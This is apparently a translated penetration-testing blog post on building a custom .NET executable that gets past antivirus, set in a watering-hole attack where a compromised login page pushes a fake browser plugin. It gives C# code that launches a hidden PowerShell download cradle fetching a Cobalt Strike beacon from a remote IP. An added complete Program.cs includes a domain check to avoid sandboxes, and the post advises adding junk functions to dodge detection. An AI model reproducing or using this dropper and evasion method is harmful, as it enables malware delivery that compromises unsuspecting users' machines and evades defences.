Hands-on: teaching penetration testers to build a .NET executable

Source: Internet
Author: User

During penetration tests we sometimes want an executable to accomplish a particular task. Recently, while testing, we compromised a site and gained the opportunity to launch a watering hole attack.

Original address: https://www.peew.pw/blog/2017/11 ... bles-for-pentesters


Background

So we embedded JavaScript in the site's login page that told users the application now required a browser plugin, and tricked them into downloading the "plugin". Initially we used an HTA file that executed a PowerShell command on the user's system to establish a C2 channel back to our server (Cobalt Strike). For some reason this did not work on the target systems. We later tested the same HTA on several of our own systems and everything worked, so we never learned whether the HTA was intercepted by something, raised the users' suspicion, or simply confused them. Either way, by replacing the HTA with a custom EXE we got a success rate of more than 50%.

An EXE file (a portable executable, or PE, the container format that holds everything Windows needs to run the program) has one drawback: it usually has to be written to disk, where AV software can easily inspect it. The usual red team tools (from Metasploit to Cobalt Strike) can generate an EXE that connects back to the attacker's machine over a C2 channel. Although each generated file differs (so the hashes are different), they are still readily flagged by AV.

VirusTotal analysis results for the default Cobalt Strike beacon payload.

There are a number of tools that wrap these PE files in different code so that they look different and evade detection, including the once-popular Veil-Evasion. Although Veil gives attackers many options, defenders know what its executable wrappers look like just as well.

Writing a custom PE file to bypass security detection

It turns out that you can bypass 99% of defensive products without sophisticated tools, advanced encryption, or 0-day exploit code. You simply need to create something custom: something the security software has never seen before. This is where writing a custom PE file comes in handy. We'll use Visual Studio to write a .NET executable that runs the commands we need.

First, start Visual Studio and create a new project. Here we can use the Windows Forms App (.NET Framework) template.

Create a new project in Visual Studio.

Since we only need an executable that runs silently (without a window), we can delete the Form1.cs that Visual Studio created and the contents of the Main function in Program.cs. If you want your malware to have a more plausible front end, keep the form and build a more convincing look.

The project after deleting the form that Visual Studio generated for us.

Next, we'll show how to launch a program from a C# application, using PowerShell as the example.

(In a future article, we'll show how to load code directly from the C# program without starting another process.)

We use the System.Diagnostics.Process class to set up and start the new process: powershell.exe is set as the file to run, and a command to execute is passed to it as an argument. In this example we have PowerShell sleep for 10 seconds so there is enough time to see how the mechanism works.

// Program.cs needs "using System.Diagnostics;" at the top for the Process class
static void Main()
{
    // Configure the child process: powershell.exe with a -c (command) argument
    Process process = new Process();
    process.StartInfo.FileName = "powershell.exe";
    // The inner quotes are escaped so the whole command reaches PowerShell as one argument
    process.StartInfo.Arguments = "-c \"Start-Sleep -s 10\"";
    process.Start();
}

When you run the program (click the Start button in the toolbar or press F5), you should see a PowerShell window appear, stay for 10 seconds, and then close. Notice that the C# process exits as soon as it has started PowerShell; it does not wait for the PowerShell process to finish.

To keep the PowerShell window out of the user's sight, it needs to be hidden. Do this through the ProcessStartInfo class rather than with PowerShell's own "-w hidden" parameter: the latter ends up in the process command line, which security software commonly flags, whereas the ProcessStartInfo setting is passed to Windows as a show-window flag and never appears there.

process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;

We can also replace the sleep command with a PowerShell command that downloads and executes a payload of our choice (for example a Cobalt Strike beacon). Obviously, the corresponding payload and listener must be set up first.

process.StartInfo.Arguments = "-c \"iex ((New-Object Net.WebClient).DownloadString('http://10.7.254.230/beacon.ps1'))\"";

Now it's time to get the EXE file. Once you have run the final version of the code, the EXE is in the project folder under ProjectName\bin\Debug\ProjectName.exe. If you don't want to run the payload on your own system, choose the Build > Build Solution menu item or press F6 to build a new EXE without executing it.

Let's see how it works!

The result

VirusTotal analysis results for our custom executable.

Not bad!

It looks like everything is fine!

Beacon obtained by running our custom executable.

Next Steps

Obviously, five lines of custom code are not a long-term solution. No doubt others will find this method useful, and as more people use it, AV will gradually start detecting it. The benefit of writing our own executable, however, is that we control the core of the program and can change it drastically at any time. It's easy to disguise the code by adding unrelated functions, whether they compute pi or sort a list.

We can also use other .NET functionality to strengthen the program. For example, if we know the domain name of the target, we can check for it before starting the PowerShell process, to avoid being caught in a sandbox.
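As an added example (not code from the original post), here is a complete Program.cs that puts the pieces above together: the hidden PowerShell launch with the download cradle from the earlier section, guarded by the domain check just described. The expected domain name CORP, the namespace Plugin and the helper names are assumptions made for this example; the cradle URL is the one used in the post.

```csharp
// Added example, not from the original post. Program.cs for the Windows
// Forms (.NET Framework) project described above, with Form1.cs removed.
using System;
using System.Diagnostics;
using System.Net.NetworkInformation;

namespace Plugin   // assumed project name
{
    static class Program
    {
        // Assumed target domain for the engagement. A sandbox or analyst VM
        // is usually in WORKGROUP or an unrelated domain, so we exit quietly.
        const string ExpectedDomain = "CORP";

        // True when either the user's logon domain or the host's DNS domain
        // contains the expected name. Both values are read locally; the
        // check itself generates no network traffic.
        static bool OnTargetDomain(string expected)
        {
            string logonDomain = Environment.UserDomainName ?? "";
            string dnsDomain = IPGlobalProperties.GetIPGlobalProperties().DomainName ?? "";
            return logonDomain.IndexOf(expected, StringComparison.OrdinalIgnoreCase) >= 0
                || dnsDomain.IndexOf(expected, StringComparison.OrdinalIgnoreCase) >= 0;
        }

        // The launch the post describes: powershell.exe with a download
        // cradle, hidden through ProcessStartInfo rather than a -w hidden
        // switch, so that string never appears in the command line.
        static ProcessStartInfo BuildLaunch(string cradleUrl)
        {
            string script = "iex ((New-Object Net.WebClient).DownloadString('" + cradleUrl + "'))";
            ProcessStartInfo psi = new ProcessStartInfo();
            psi.FileName = "powershell.exe";
            psi.Arguments = "-c \"" + script + "\"";
            // With .NET Framework's default UseShellExecute = true this is
            // handed to ShellExecuteEx as SW_HIDE, not as a PowerShell argument.
            psi.WindowStyle = ProcessWindowStyle.Hidden;
            return psi;
        }

        static void Main()
        {
            // Not the target's domain (probably a sandbox): do nothing at all.
            if (!OnTargetDomain(ExpectedDomain))
                return;

            // The cradle text is still visible in process-creation logs
            // (Sysmon event 1, Windows 4688) and in PowerShell script block
            // logging; only the window is hidden.
            Process.Start(BuildLaunch("http://10.7.254.230/beacon.ps1"));
        }
    }
}
```

Build it with Build > Build Solution as above. Running the EXE on a workgroup machine does nothing, which is also the simplest way to confirm the guard works before using it on the engagement's domain.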

Obviously, we still invoke PowerShell here, so any logging or alerting associated with PowerShell still applies. Ideally we would not invoke any program other than our custom executable.

The next important step is to move the entire payload into the executable. This involves several pieces, from hosting the PowerShell code inside the program itself, to performing the download and execution from our own code, to loading the shellcode into memory.
